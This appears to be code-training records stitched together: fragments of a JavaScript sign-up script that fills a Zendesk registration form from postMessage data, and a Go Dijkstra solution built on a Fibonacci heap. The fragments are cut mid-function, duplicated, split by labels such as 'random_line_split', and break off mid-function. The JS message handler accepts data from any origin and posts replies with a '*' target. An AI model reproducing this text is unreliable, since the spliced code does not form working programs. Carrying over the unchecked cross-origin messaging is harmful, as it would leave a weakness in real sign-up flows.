toggleLoading(true, 'loading-creating');
/* Turn off further validation on subdomain while clearbit changes the value
and we override it back. */
subdomainInput = findInputElm(subdomainInputName)
.off('keypress keyup keydown focus blur');
/* Need to keep subdomain b/c it'll be overridden by clearbit. */
subdomain = subdomainInput.val();
/* Populate inputs to pass validation, so clearbit can run. */
encodeChatAccountInDom();
/* Hack this fn again, this time as a callback for clearbit completion. */
webutils.pushStateFragment = function() {
webutils.pushStateFragment = $.noop;
/* Encode again to override clearbit. */
encodeChatAccountInDom();
setInputValue(subdomainInputName, subdomain);
/* Hack. Prevent redirecting on current window. Also conveniently use it to
attach a callback. */
webutils.redirect = handleAccountCreationSuccess;
window.handleAccountCreationFailure = handleAccountCreationFailure;
/* Prob not needed since we took validation off subdomain, but just in case. */
$('.domain-ping').hide();
/* Note, this implements a retry logic (but is disabled atm). */
$('.create-account').trigger('click');
};
/* Call clearbit. This is the earliest opportunity we have to do so.
Validation must pass for all inputs within .step-1, which contains
password and email. Password was filled in our 2nd step, and email was
filled by `encodeChatAccountInDom`. */
$('.step li.error').removeClass('error');
$('.step-1 a.next').trigger('click');
}
/* The underlying implementation for account creation reads DOM to construct
payload, so we have to dump a representation of agents into DOM first.
The inputs can be children of any `form.reg`.
number_employees is not available for older accounts.
owner_phone is not available.
currency is not available.
(But leave the logic for population here anyway. Defaults are used to pass
valiation.) */
function encodeChatAccountInDom() {
setInputValue('owner[email]', chatAccount.owner_email);
encodeCompanyName();
setInputValue('account[help_desk_size]', chatAccount.number_employees || '1-9');
setInputValue('owner[name]', chatAccount.owner_name);
setInputValue('address[phone]', chatAccount.owner_phone || '000-000-0000');
encodeLanguage();
encodeCurrency();
toggleEncodeAgents();
encodeEloqua();
}
/* Pick the first non-empty value among those [
provided by zopim,
detected by clearbit which should already be encoded in dom,
email host
]. */
function encodeCompanyName() {
var name = 'account[name]';
function emailHost(email) {
return email.match(/@(.+)\./)[1];
}
if (chatAccount.company_name) {
setInputValue(name, chatAccount.company_name);
} else if (!findInputElm(name).val()) {
setInputValue(name, emailHost(chatAccount.owner_email));
}
}
/* Attr `name=language` is changed to `name=account[language]` if using fast
creation; let jquery find either.
When setting <select>'s `value`, if it's not support by one of the <option>
elements, then the `value` would be null. Then, the value would be defaulted
to US English by Classic.
To avoid this defaulting, set iff there is a match; otherwise, defer to the
existing code which infers it from `location.host`.
The list of Chat's language codes is at
https://github.com/zopim/meshim-frontend/blob/master/src/meshim/dashboard/controllers/Language.js */
function encodeLanguage() {
var select = findInputElm('language').add(findInputElm('account[language]'));
var options = select.children('option');
var code = chatAccount.language.replace(/_/, '-').toLowerCase();
var isCodeValid = hasOption(code);
function hasOption(val) {
return options.filter(function() {
return this.value === val;
}).length;
}
if (!isCodeValid) {
code = code.replace(/-.*/, '');
isCodeValid = hasOption(code);
}
if (isCodeValid) {
setInputValue('language', code);
setInputValue('account[language]', code);
}
}
/* Supported values are the case-insensitive versions of the `CurrencyType`
constants in
https://github.com/zendesk/zendesk_types/blob/master/lib/zendesk/types.rb
Other values including the empty value is defaulted to 'USD' by Classic.
To avoid this defaulting, set iff value is supported; otherwise, defer to the
existing code which infers it from `location.host`. */
function encodeCurrency() {
if (!chatAccount.currency) {
return;
}
var currency = chatAccount.currency.toUpperCase();
if (['USD','EUR','GBP','JPY'].indexOf(currency) >= 0) {
setInputValue('account[currency]', currency);
}
}
function toggleEncodeAgents() {
var className = 'reg-xsell-from-chat-agent';
var doPopulate = $('.include-agents input').prop('checked');
var inputs;
elements.extraInputsParent.find('.' + className).remove();
if (doPopulate) {
inputs = $();
$.each(chatAccount.agents, function(i, agentData) {
var namePrefix = 'agents[' + i + ']';
agentData.role = 'Agent';
$.each(['name', 'email', 'role'], function(j, prop) {
inputs = inputs.add(
$('<input type="hidden">')
.addClass(className)
.attr('name', namePrefix + '[' + prop + ']')
.val(agentData[prop])
);
});
});
inputs.appendTo(elements.extraInputsParent);
}
}
function encodeEloqua() {
var chatPlanInputName = 'Chat_plan';
var chatPlanInput = findInputElm(chatPlanInputName);
if (!chatPlanInput.length) {
// webutils.postToEloqua requries id and type attrs.
chatPlanInput = $('<input type="text">')
.attr('id', chatPlanInputName)
.attr('name', chatPlanInputName)
.appendTo(elements.extraInputsParent);
}
chatPlanInput.val(chatAccount.plan_name);
/* Need to use a different eloqua form */
setInputValue('elqFormName', 'chatxsell');
}
/* Defining a separate function for setting value, so that in case we want
to e.g. trigger events before and after setting it, it'd be easy to write it
here.
Events that we might want include click, focus, keypress, change. These
events are handled by the underlying code for various purposes including
validation.
But b/c the underlying code is really involved, it's probably safer to not
trigger anything, and instead let `function register` call `validate`
on each input, later. */
function setInputValue(name, val) {
findInputElm(name).val(val);
}
function findInputElm(name) {
var selector = 'form.reg [name="' + name + '"]';
return $(selector);
}
function handleAccountCreationSuccess(verificationUri) {
postMessageToZopim('accountCreated', verificationUri);
}
function handleAccountCreationFailure() {
elements.root.addClass('error');
toggleLoading(false, 'loading-creating');
}
function translatedParagraph(clazz) {
return elements.root.find('.translated').find('.' + clazz);
}
function postMessageToZopim(action, data) {
window.top.postMessage(JSON.stringify({
target: 'zdSignup',
action: action,
data: data
}), '*');
}
function toggleLoading(isLoading, clazz) {
clazz = (clazz || '') + ' loading';
elements.root.toggleClass(clazz, isLoading);
}
/* Test with any of
```
window.postMessage(JSON.stringify({
owner_email: 'foo@bar.com',
owner_phone: '123-123-1234',
owner_name: 'first last',
company_name: 'megacorp',
number_employees: 234,
language: 'fr',
currency: 'EUR',
agents: [
{
name: 'agent num0',
email: 'agent+0@zendesk.com'
},
{
name: 'agent num1',
email: 'agent+1@zendesk.com'
}
],
plan_name: 'this is the plan name'
}), window.location.origin)
window.postMessage('{"owner_name":"Test Agent Owner","owner_email":"testagent@zopim.com","agents":[{"name":"Test Agent 1","email":"a1@z.com"},{"name":"Test Agent 2","email":"a2@z.com"},{"name":"Test Agent 3","email":"a3@z.com"},{"name":"Test Agent 4","email":"a4@z.com"},{"name":"Test Agent 5","email":"a5@z.com"}],"company_name":"testaccount","number_employees":"","language":"en"}', location.origin)
``` */
$(window).on('message onmessage', function(e) {
var chatAccount_ = e.data || (e.originalEvent && e.originalEvent.data);
if (!chatAccount_) {
return;
}
try {
chatAccount_ = JSON.parse(chatAccount_);
} catch (err) {
return;
}
// Ignore a myriad of other kinds of valid `postMessage`s.
if (!chatAccount_.owner_email) {
return;
}
chatAccount = chatAccount_;
if (chatAccount.agents && chatAccount.agents.length) {
$('.include-agents').addClass(shownClass);
}
toggleLoading(false);
});
/* After onmessage handler is attached, let the embedding zopim page know
it can postMessage to this reg form. */
postMessageToZopim('formReady');
$('.reg-xsell-from-chat-already-have').on('click', function() {
postMessageToZopim('showIntegrate');
});
elements.subdomainContainer
.addClass(shownClass)
.find('input')
.prop('placeholder', translatedParagraph('subdomain-placeholder').text());
elements.passwordContainer
.find('input')
.prop('placeholder', translatedParagraph('password-placeholder').text());
swapNextButtonHandler();
}); | input.is('.set') &&
Number(elements.passwordContainer.find('label.error').css('opacity')) === 0;
} | random_line_split |
p-register-xsell-from-chat.js | $(function() {
/* Setup.
Disable pushing states, b/c we don't support backwards navigation, i.e. we
don't re-enable the Next button, to keep things simple.
The initial pushing of the #getstarted state still happens before we can
disable it. */
webutils.pushStateFragment = $.noop;
var elements = {
root: $('.reg-xsell-from-chat'),
/* Payloads for both account creation and eloqua are made by searching for
inputs within `form.reg`. Any of them will do. */
extraInputsParent: $('form.reg').first(),
subdomainContainer: $('.domain'),
passwordContainer: $('.password-row'),
nextButton: $('.reg-xsell-from-chat-next')
};
var shownClass = 'reg-xsell-from-chat-shown';
/* Data will be pushed from zopim. */
var chatAccount;
var currentStep = -1;
/* Behaviors of the Next button at each step. */
var nextButtonHandlers = [
function() {
var input = elements.subdomainContainer.find('input');
function isValid() {
return input.is('.set') &&
Number(elements.subdomainContainer.find('label.error').css('opacity')) === 0 &&
Number(elements.subdomainContainer.find('label.suggested').css('opacity')) === 0;
}
function toNextStep() {
swapNextButtonHandler();
$('.domain-ping').hide();
elements.subdomainContainer.removeClass(shownClass);
elements.passwordContainer.addClass(shownClass);
}
triggerNextActionOnValidatedUserInput(input, isValid, toNextStep);
},
function() {
var input = elements.passwordContainer.find('input');
function | () {
return !elements.passwordContainer.is('.error') &&
input.is('.set') &&
Number(elements.passwordContainer.find('label.error').css('opacity')) === 0;
}
triggerNextActionOnValidatedUserInput(input, isValid, createAccount);
}
];
function swapNextButtonHandler() {
++currentStep;
elements.nextButton
.off('click')
.on('click', nextButtonHandlers[currentStep]);
}
function triggerNextActionOnValidatedUserInput(input, isValid, nextAction) {
var initVal = input.val();
if (isValid()) {
nextAction();
} else {
/* Just in case validation hasn't happened yet or the input was never
focused on by the user at all (eg auto-populated by browser), force
trigger validation.
`isValid` is expected to return false when validation hasn't happened
yet. */
input.trigger('blur');
disableNextButtonTillValidated(isValid, function() {
var currVal = input.val();
/* If the value that is now finally valid is different from the original
invalid value when user tried to trigger the next action, then do not
automatically trigger the next action but force the user to trigger
it again.
Eg when subdomain validation picks a different value, or when user
corrects the password and blurs from the input, give user a chance to
think about this new value, and force user to click on the Next button
again. */
if (initVal != currVal) {
return;
}
nextAction();
});
}
}
function disableNextButtonTillValidated(isValid, whenValid) {
var intervalId;
function toggleDisable(disable) {
elements.nextButton
.prop('disabled', disable)
.toggleClass('btn-disabled', disable);
}
toggleDisable(true);
intervalId = setInterval(function() {
if (isValid()) {
clearInterval(intervalId);
whenValid();
toggleDisable(false);
}
}, 300);
}
function createAccount() {
var subdomainInputName = 'account[subdomain]';
var subdomainInput, subdomain;
toggleLoading(true, 'loading-creating');
/* Turn off further validation on subdomain while clearbit changes the value
and we override it back. */
subdomainInput = findInputElm(subdomainInputName)
.off('keypress keyup keydown focus blur');
/* Need to keep subdomain b/c it'll be overridden by clearbit. */
subdomain = subdomainInput.val();
/* Populate inputs to pass validation, so clearbit can run. */
encodeChatAccountInDom();
/* Hack this fn again, this time as a callback for clearbit completion. */
webutils.pushStateFragment = function() {
webutils.pushStateFragment = $.noop;
/* Encode again to override clearbit. */
encodeChatAccountInDom();
setInputValue(subdomainInputName, subdomain);
/* Hack. Prevent redirecting on current window. Also conveniently use it to
attach a callback. */
webutils.redirect = handleAccountCreationSuccess;
window.handleAccountCreationFailure = handleAccountCreationFailure;
/* Prob not needed since we took validation off subdomain, but just in case. */
$('.domain-ping').hide();
/* Note, this implements a retry logic (but is disabled atm). */
$('.create-account').trigger('click');
};
/* Call clearbit. This is the earliest opportunity we have to do so.
Validation must pass for all inputs within .step-1, which contains
password and email. Password was filled in our 2nd step, and email was
filled by `encodeChatAccountInDom`. */
$('.step li.error').removeClass('error');
$('.step-1 a.next').trigger('click');
}
/* The underlying implementation for account creation reads DOM to construct
payload, so we have to dump a representation of agents into DOM first.
The inputs can be children of any `form.reg`.
number_employees is not available for older accounts.
owner_phone is not available.
currency is not available.
(But leave the logic for population here anyway. Defaults are used to pass
valiation.) */
function encodeChatAccountInDom() {
setInputValue('owner[email]', chatAccount.owner_email);
encodeCompanyName();
setInputValue('account[help_desk_size]', chatAccount.number_employees || '1-9');
setInputValue('owner[name]', chatAccount.owner_name);
setInputValue('address[phone]', chatAccount.owner_phone || '000-000-0000');
encodeLanguage();
encodeCurrency();
toggleEncodeAgents();
encodeEloqua();
}
/* Pick the first non-empty value among those [
provided by zopim,
detected by clearbit which should already be encoded in dom,
email host
]. */
function encodeCompanyName() {
var name = 'account[name]';
function emailHost(email) {
return email.match(/@(.+)\./)[1];
}
if (chatAccount.company_name) {
setInputValue(name, chatAccount.company_name);
} else if (!findInputElm(name).val()) {
setInputValue(name, emailHost(chatAccount.owner_email));
}
}
/* Attr `name=language` is changed to `name=account[language]` if using fast
creation; let jquery find either.
When setting <select>'s `value`, if it's not support by one of the <option>
elements, then the `value` would be null. Then, the value would be defaulted
to US English by Classic.
To avoid this defaulting, set iff there is a match; otherwise, defer to the
existing code which infers it from `location.host`.
The list of Chat's language codes is at
https://github.com/zopim/meshim-frontend/blob/master/src/meshim/dashboard/controllers/Language.js */
function encodeLanguage() {
var select = findInputElm('language').add(findInputElm('account[language]'));
var options = select.children('option');
var code = chatAccount.language.replace(/_/, '-').toLowerCase();
var isCodeValid = hasOption(code);
function hasOption(val) {
return options.filter(function() {
return this.value === val;
}).length;
}
if (!isCodeValid) {
code = code.replace(/-.*/, '');
isCodeValid = hasOption(code);
}
if (isCodeValid) {
setInputValue('language', code);
setInputValue('account[language]', code);
}
}
/* Supported values are the case-insensitive versions of the `CurrencyType`
constants in
https://github.com/zendesk/zendesk_types/blob/master/lib/zendesk/types.rb
Other values including the empty value is defaulted to 'USD' by Classic.
To avoid this defaulting, set iff value is supported; otherwise, defer to the
existing code which infers it from `location.host`. */
function encodeCurrency() {
if (!chatAccount.currency) {
return;
}
var currency = chatAccount.currency.toUpperCase();
if (['USD','EUR','GBP','JPY'].indexOf(currency) >= 0) {
setInputValue('account[currency]', currency);
}
}
function toggleEncodeAgents() {
var className = 'reg-xsell-from-chat-agent';
var doPopulate = $('.include-agents input').prop('checked');
var inputs;
elements.extraInputsParent.find('.' + className).remove();
if (doPopulate) {
inputs = $();
$.each(chatAccount.agents, function(i, agentData) {
var namePrefix = 'agents[' + i + ']';
agentData.role = 'Agent';
$.each(['name', 'email', 'role'], function(j, prop) {
inputs = inputs.add(
$('<input type="hidden">')
.addClass(className)
.attr('name', namePrefix + '[' + prop + ']')
.val(agentData[prop])
);
});
});
inputs.appendTo(elements.extraInputsParent);
}
}
function encodeEloqua() {
var chatPlanInputName = 'Chat_plan';
var chatPlanInput = findInputElm(chatPlanInputName);
if (!chatPlanInput.length) {
// webutils.postToEloqua requries id and type attrs.
chatPlanInput = $('<input type="text">')
.attr('id', chatPlanInputName)
.attr('name', chatPlanInputName)
.appendTo(elements.extraInputsParent);
}
chatPlanInput.val(chatAccount.plan_name);
/* Need to use a different eloqua form */
setInputValue('elqFormName', 'chatxsell');
}
/* Defining a separate function for setting value, so that in case we want
to e.g. trigger events before and after setting it, it'd be easy to write it
here.
Events that we might want include click, focus, keypress, change. These
events are handled by the underlying code for various purposes including
validation.
But b/c the underlying code is really involved, it's probably safer to not
trigger anything, and instead let `function register` call `validate`
on each input, later. */
function setInputValue(name, val) {
findInputElm(name).val(val);
}
function findInputElm(name) {
var selector = 'form.reg [name="' + name + '"]';
return $(selector);
}
function handleAccountCreationSuccess(verificationUri) {
postMessageToZopim('accountCreated', verificationUri);
}
function handleAccountCreationFailure() {
elements.root.addClass('error');
toggleLoading(false, 'loading-creating');
}
function translatedParagraph(clazz) {
return elements.root.find('.translated').find('.' + clazz);
}
function postMessageToZopim(action, data) {
window.top.postMessage(JSON.stringify({
target: 'zdSignup',
action: action,
data: data
}), '*');
}
function toggleLoading(isLoading, clazz) {
clazz = (clazz || '') + ' loading';
elements.root.toggleClass(clazz, isLoading);
}
/* Test with any of
```
window.postMessage(JSON.stringify({
owner_email: 'foo@bar.com',
owner_phone: '123-123-1234',
owner_name: 'first last',
company_name: 'megacorp',
number_employees: 234,
language: 'fr',
currency: 'EUR',
agents: [
{
name: 'agent num0',
email: 'agent+0@zendesk.com'
},
{
name: 'agent num1',
email: 'agent+1@zendesk.com'
}
],
plan_name: 'this is the plan name'
}), window.location.origin)
window.postMessage('{"owner_name":"Test Agent Owner","owner_email":"testagent@zopim.com","agents":[{"name":"Test Agent 1","email":"a1@z.com"},{"name":"Test Agent 2","email":"a2@z.com"},{"name":"Test Agent 3","email":"a3@z.com"},{"name":"Test Agent 4","email":"a4@z.com"},{"name":"Test Agent 5","email":"a5@z.com"}],"company_name":"testaccount","number_employees":"","language":"en"}', location.origin)
``` */
$(window).on('message onmessage', function(e) {
var chatAccount_ = e.data || (e.originalEvent && e.originalEvent.data);
if (!chatAccount_) {
return;
}
try {
chatAccount_ = JSON.parse(chatAccount_);
} catch (err) {
return;
}
// Ignore a myriad of other kinds of valid `postMessage`s.
if (!chatAccount_.owner_email) {
return;
}
chatAccount = chatAccount_;
if (chatAccount.agents && chatAccount.agents.length) {
$('.include-agents').addClass(shownClass);
}
toggleLoading(false);
});
/* After onmessage handler is attached, let the embedding zopim page know
it can postMessage to this reg form. */
postMessageToZopim('formReady');
$('.reg-xsell-from-chat-already-have').on('click', function() {
postMessageToZopim('showIntegrate');
});
elements.subdomainContainer
.addClass(shownClass)
.find('input')
.prop('placeholder', translatedParagraph('subdomain-placeholder').text());
elements.passwordContainer
.find('input')
.prop('placeholder', translatedParagraph('password-placeholder').text());
swapNextButtonHandler();
});
| isValid | identifier_name |
full_heap.go | /**
This is Dijkstra on Fibonacci Heap realisation in one file
that solves this Codeforces Problem https://codeforces.com/contest/20/problem/C
(It gives TL but only because GO is a little slow without optimizations)
@author SeaEagle
*/
package main
import (
"errors"
"fmt"
)
func main() {
var n, m int
fmt.Scan(&n, &m)
g := Graph{Size: n}
for i := 0; i < m; i++ {
var from, to, cost int
fmt.Scan(&from, &to, &cost)
g.AddEdge(Edge{From: from, To: to, Cost: int64(cost)})
}
dist, path := ShortestPathHeap(&g, 1, n)
if dist == Inf {
fmt.Println(-1)
} else {
for _, val := range path {
fmt.Printf("%v ", val)
}
}
}
type GNode = int
type IntPair struct {
first int
second int64
}
func (i IntPair) LessThen(j interface{}) bool {
return i.second < j.(IntPair).second
}
func (i IntPair) EqualsTo(j interface{}) bool {
return i.second == j.(IntPair).second
}
func (i IntPair) MinusInf() Value {
return IntPair{-1e9, -Inf}
}
type Edge struct {
From GNode
To GNode
Cost int64
}
const Inf = 1e18
type Graph struct {
Size int
edges map[GNode][]IntPair
}
func (g *Graph) AddEdge(e Edge) {
if g.Size == 0 || g.edges == nil {
g.init()
}
if g.edges[e.From] == nil {
g.edges[e.From] = make([]IntPair, 0)
}
if g.edges[e.To] == nil {
g.edges[e.To] = make([]IntPair, 0)
}
g.edges[e.From] = append(g.edges[e.From], IntPair{e.To, e.Cost})
g.edges[e.To] = append(g.edges[e.To], IntPair{e.From, e.Cost})
}
func (g *Graph) init() {
g.edges = make(map[GNode][]IntPair)
}
func DijkstraHeap(g *Graph, start int) (dist []int64, p []GNode) {
dist = make([]int64, g.Size+1)
p = make([]int, g.Size+1)
for i := range dist {
dist[i] = Inf
}
dist[start] = 0
heap := FibonacciHeap{}
heap.Insert(IntPair{start, 0})
for !heap.IsEmpty() {
var cur IntPair
tmp, _ := heap.ExtractMin()
cur = tmp.(IntPair)
v := cur.first
for _, pair := range g.edges[v] {
to := pair.first
cost := pair.second
if dist[to] > dist[v]+cost {
heap.DeleteKey(IntPair{to, dist[to]})
dist[to] = dist[v] + cost
p[to] = v
heap.Insert(IntPair{to, dist[to]})
}
}
}
return
}
func ShortestPathHeap(g *Graph, start int, finish int) (dist int64, path []GNode) {
d, pr := DijkstraHeap(g, start)
dist = d[finish]
if dist == Inf {
return
}
path = make([]GNode, 0)
path = append(path, finish)
for start != finish {
finish = pr[finish]
path = append(path, finish)
}
for i, j := 0, len(path)-1; i < j; i, j = i+1, j-1 {
path[i], path[j] = path[j], path[i]
}
return
}
//Value is an interface every heap value must implement
//Three self-explanatory methods
type Value interface {
LessThen(j interface{}) bool
EqualsTo(j interface{}) bool
MinusInf() Value
}
//Node is a struct for node, all Values need to implement Value interface
type Node struct {
key Value
parent *Node
child *Node //Only one child, we can iterate children cyclical using left right pointers
left *Node //Cyclic doubly-linked-list
right *Node
degree int //Number of child ren
marked bool //If we already cut this node's child
}
//FibonacciHeap is represented with pointer to minimum, size
//and hashmap (value, pointer to node with that value)
//THAT MEANS TO USE DECREASE CORRECTLY YOU NEED UNIQUE ENTIES
//It could be done with some sort of hashes in your structure
type FibonacciHeap struct {
min *Node
size int
nodes map[Value]*Node
}
//Decrease method accepts old and new value and changes that in heap
//If there is no entry that matches OR new value is bigger than old
//A not-nil error is returned
func (f *FibonacciHeap) Decrease(x Value, newVal Value) error {
if f.nodes[x] == nil {
return errors.New("no such element in heap")
}
if !newVal.LessThen(x) && !newVal.EqualsTo(x) {
return errors.New("cannot increase element")
}
node := f.nodes[x]
delete(f.nodes, x) //Delete entry from map and put updated one
f.nodes[newVal] = node
node.key = newVal
if node.parent == nil || node.parent.key.LessThen(newVal) { //If it is root or we don't break the heap
f.updateMin(node)
return nil //Update minimum and return
}
parent := node.parent
f.cut(node) //Cut the subtree out and make it a new root
f.cascadingCut(parent) //Do it with all parents if needed
return nil
}
//cascadingCut is a method that goes up a heap,
//and cuts every parent who is <b>marked</b>
func (f *FibonacciHeap) cascadingCut(node *Node) {
for node.parent != nil && node.marked {
parent := node.parent
f.cut(node)
node = parent
}
if node.parent != nil {
node.marked = true
f.updateMin(node.parent)
}
f.updateMin(node)
}
//cut is a method to cut out a sub-heap from parent
//and take it out to roots level
func (f *FibonacciHeap) cut(node *Node) {
node.left.right, node.right.left = node.right, node.left //cut the node from linked list
node.parent.degree--
if node.parent.child == node { //If this node is the main child, we need to make a new main child
if node.parent.degree == 0 {
node.parent.child = nil
} else {
node.parent.child = node.right
}
}
node.left, node.right = node, node //inserting node into top level linked list
node.parent = nil
f.uniteLists(f.min, node)
f.updateMin(node)
}
//DeleteKey accepts a Value to delete
//It is very simple - just Decrease the needed Value
//And ExtractMin-s it
func (f *FibonacciHeap) DeleteKey(x Value) error {
err := f.Decrease(x, x.MinusInf())
if err != nil {
return err
}
_, err = f.ExtractMin()
return err
}
//FindMin returns the minimum value of the heap
//Just returning the pointer to min
func (f *FibonacciHeap) FindMin() (Value, error) {
if !f.IsEmpty() {
return f.min.key, nil
} else {
return nil, errors.New("unable to get minimum from an empty heap")
}
}
//Insert inserts certain Value into heap
//By just inserting it into root-level linked-list
//To the right from minimum
func (f *FibonacciHeap) Insert(x Value) {
if f.IsEmpty() | else {
newNode := &Node{x, nil, nil, f.min, f.min.right, 0, false} //Create a new node
f.min.right.left = newNode
f.min.right = newNode
f.updateMin(newNode)
f.nodes[x] = newNode
}
f.size++
}
//ExtractMin deletes the minimum value of the heap and returns it
//If heap is empty there comes an error
//Implementation is not that simple, we cut all children
//and make them new roots, after that we need to rebuild out heap
//with consolidate method
func (f *FibonacciHeap) ExtractMin() (Value, error) {
if f.IsEmpty() {
return nil, errors.New("unable to get minimum from an empty heap")
}
res := f.min.key
delete(f.nodes, f.min.key)
if f.GetSize() == 1 { //If it was the only node return
f.min = nil
f.size = 0
return res, nil
}
f.cutChildren(f.min, f.min.child)
f.min.left.right = f.min.right
f.min.right.left = f.min.left
f.min = f.min.right //Move min pointer to the right, consolidation will fin new min
f.consolidate()
f.size--
return res, nil
}
//cutChildren is a fun-named method that cuts children from parent
//It iterates throw all children to invalidate parent pointer
//And then just makes them new roots
func (f *FibonacciHeap) cutChildren(father *Node, child *Node) {
if child == nil {
return
}
start := child
start.parent = nil
cur := child.right
for cur != start {
cur.parent = nil
cur = cur.right
}
father.child = nil
f.uniteLists(father, child)
}
//consolidate is a heavy O(log n) function
//What it does is just find two root trees with same degree
//And then hang the bigger (by node.key) one to smaller
func (f *FibonacciHeap) consolidate() {
var used = make([]*Node, f.size) //We use a slice to track collisions in node.degree
used[f.min.degree] = f.min
cur := f.min.right
for used[cur.degree] != cur { //We always go right, so if we placed something to slice, made a lap, and nothing changed, consolidation is finished
f.updateMin(cur)
if used[cur.degree] == nil { //If yet no other node with same degree recorder - record current
used[cur.degree] = cur
cur = cur.right
} else {
busy := used[cur.degree]
father, son := cur, busy
if busy.key.LessThen(cur.key) { //make father point to lighter node, son to heavier one
father, son = son, father
} else if father.key.EqualsTo(son.key) { //make sure f.min is always father
if son == f.min {
father, son = son, father
}
}
son.left.right = son.right
son.right.left = son.left //cut the son from his local linked-list
next := cur.right //remember next to be right from current cur, it can change later
if father.child == nil { //If father has no children - son is the first
father.child = son
son.left, son.right = son, son
} else { //else integrate son into children linked-list
son.left, son.right = father.child, father.child.right
father.child.right.left = son
father.child.right = son
}
used[cur.degree] = nil
son.parent = father
father.degree++
cur = next
}
f.updateMin(cur)
}
}
func (f *FibonacciHeap) updateMin(comp *Node) {
if comp.key.LessThen(f.min.key) {
f.min = comp
return
}
if comp.key.EqualsTo(f.min.key) {
if comp.parent == nil && f.min.parent != nil {
f.min = comp
return
}
for f.min.parent != nil {
f.min = f.min.parent
}
}
}
//Merge just merges two fibonacci heaps together
//It could be O(1) if we dont need to hold relevant hashmap
//That helps to do search in O(1)*
func (f *FibonacciHeap) Merge(heap *FibonacciHeap) {
if heap.size == 0 {
return
}
if f.size == 0 { //if our heap is zero-sized, just change pointers to another list
f.min = heap.min
f.size = heap.size
} else {
f.uniteLists(f.min, heap.min) //Unites two lists
f.size += heap.size
f.updateMin(heap.min)
}
for k, v := range heap.nodes { //O(n) code here!!
f.nodes[k] = v
}
}
//uniteLists is simple function that unites two cyclic doubly-linked-lists into one
func (f *FibonacciHeap) uniteLists(first *Node, second *Node) {
if second == nil || first == nil {
return
}
first.left.right = second.right
second.right.left = first.left
first.left = second
second.right = first
}
//GetSize returns current size of the heap (number of nodes)
func (f *FibonacciHeap) GetSize() int {
return f.size
}
//IsEmpty returns true if fibheap is empty
func (f *FibonacciHeap) IsEmpty() bool {
return f.size == 0
}
//init function creates an empty node and initialize hashmap
func (f *FibonacciHeap) init() {
f.min = &(Node{})
f.nodes = make(map[Value]*Node)
f.size = 0
}
| {
f.init()
f.min.key = x
f.min.left, f.min.right = f.min, f.min
f.nodes[x] = f.min
} | conditional_block |
full_heap.go | /**
This is Dijkstra on Fibonacci Heap realisation in one file
that solves this Codeforces Problem https://codeforces.com/contest/20/problem/C
(It gives TL but only because GO is a little slow without optimizations)
@author SeaEagle
*/
package main
import (
"errors"
"fmt"
)
func main() {
var n, m int
fmt.Scan(&n, &m)
g := Graph{Size: n}
for i := 0; i < m; i++ {
var from, to, cost int
fmt.Scan(&from, &to, &cost)
g.AddEdge(Edge{From: from, To: to, Cost: int64(cost)})
}
dist, path := ShortestPathHeap(&g, 1, n)
if dist == Inf {
fmt.Println(-1)
} else {
for _, val := range path {
fmt.Printf("%v ", val)
}
}
}
type GNode = int
type IntPair struct {
first int
second int64
}
func (i IntPair) LessThen(j interface{}) bool {
return i.second < j.(IntPair).second
}
func (i IntPair) EqualsTo(j interface{}) bool {
return i.second == j.(IntPair).second
}
func (i IntPair) MinusInf() Value {
return IntPair{-1e9, -Inf}
}
type Edge struct {
From GNode
To GNode
Cost int64
}
const Inf = 1e18
type Graph struct {
Size int
edges map[GNode][]IntPair
}
func (g *Graph) AddEdge(e Edge) {
if g.Size == 0 || g.edges == nil {
g.init()
}
if g.edges[e.From] == nil {
g.edges[e.From] = make([]IntPair, 0)
}
if g.edges[e.To] == nil {
g.edges[e.To] = make([]IntPair, 0)
}
g.edges[e.From] = append(g.edges[e.From], IntPair{e.To, e.Cost})
g.edges[e.To] = append(g.edges[e.To], IntPair{e.From, e.Cost})
}
func (g *Graph) init() {
g.edges = make(map[GNode][]IntPair)
}
func DijkstraHeap(g *Graph, start int) (dist []int64, p []GNode) {
dist = make([]int64, g.Size+1)
p = make([]int, g.Size+1)
for i := range dist {
dist[i] = Inf
}
dist[start] = 0
heap := FibonacciHeap{}
heap.Insert(IntPair{start, 0})
for !heap.IsEmpty() {
var cur IntPair
tmp, _ := heap.ExtractMin()
cur = tmp.(IntPair)
v := cur.first
for _, pair := range g.edges[v] {
to := pair.first
cost := pair.second
if dist[to] > dist[v]+cost {
heap.DeleteKey(IntPair{to, dist[to]})
dist[to] = dist[v] + cost
p[to] = v
heap.Insert(IntPair{to, dist[to]})
}
}
}
return
}
func ShortestPathHeap(g *Graph, start int, finish int) (dist int64, path []GNode) {
d, pr := DijkstraHeap(g, start)
dist = d[finish]
if dist == Inf {
return
}
path = make([]GNode, 0)
path = append(path, finish)
for start != finish {
finish = pr[finish]
path = append(path, finish)
}
for i, j := 0, len(path)-1; i < j; i, j = i+1, j-1 {
path[i], path[j] = path[j], path[i]
}
return
}
//Value is an interface every heap value must implement
//Three self-explanatory methods
type Value interface {
LessThen(j interface{}) bool
EqualsTo(j interface{}) bool
MinusInf() Value
}
//Node is a struct for node, all Values need to implement Value interface
type Node struct {
key Value
parent *Node
child *Node //Only one child, we can iterate children cyclical using left right pointers
left *Node //Cyclic doubly-linked-list
right *Node
degree int //Number of child ren
marked bool //If we already cut this node's child
}
//FibonacciHeap is represented with pointer to minimum, size
//and hashmap (value, pointer to node with that value)
//THAT MEANS TO USE DECREASE CORRECTLY YOU NEED UNIQUE ENTIES
//It could be done with some sort of hashes in your structure
type FibonacciHeap struct {
min *Node
size int
nodes map[Value]*Node
}
//Decrease method accepts old and new value and changes that in heap
//If there is no entry that matches OR new value is bigger than old
//A not-nil error is returned
func (f *FibonacciHeap) Decrease(x Value, newVal Value) error {
if f.nodes[x] == nil {
return errors.New("no such element in heap")
}
if !newVal.LessThen(x) && !newVal.EqualsTo(x) {
return errors.New("cannot increase element")
}
node := f.nodes[x]
delete(f.nodes, x) //Delete entry from map and put updated one
f.nodes[newVal] = node
node.key = newVal
if node.parent == nil || node.parent.key.LessThen(newVal) { //If it is root or we don't break the heap
f.updateMin(node)
return nil //Update minimum and return
}
parent := node.parent
f.cut(node) //Cut the subtree out and make it a new root
f.cascadingCut(parent) //Do it with all parents if needed
return nil
}
//cascadingCut is a method that goes up a heap,
//and cuts every parent who is <b>marked</b>
func (f *FibonacciHeap) cascadingCut(node *Node) {
for node.parent != nil && node.marked {
parent := node.parent
f.cut(node)
node = parent
}
if node.parent != nil {
node.marked = true
f.updateMin(node.parent)
}
f.updateMin(node)
}
//cut is a method to cut out a sub-heap from parent
//and take it out to roots level
func (f *FibonacciHeap) cut(node *Node) {
node.left.right, node.right.left = node.right, node.left //cut the node from linked list
node.parent.degree--
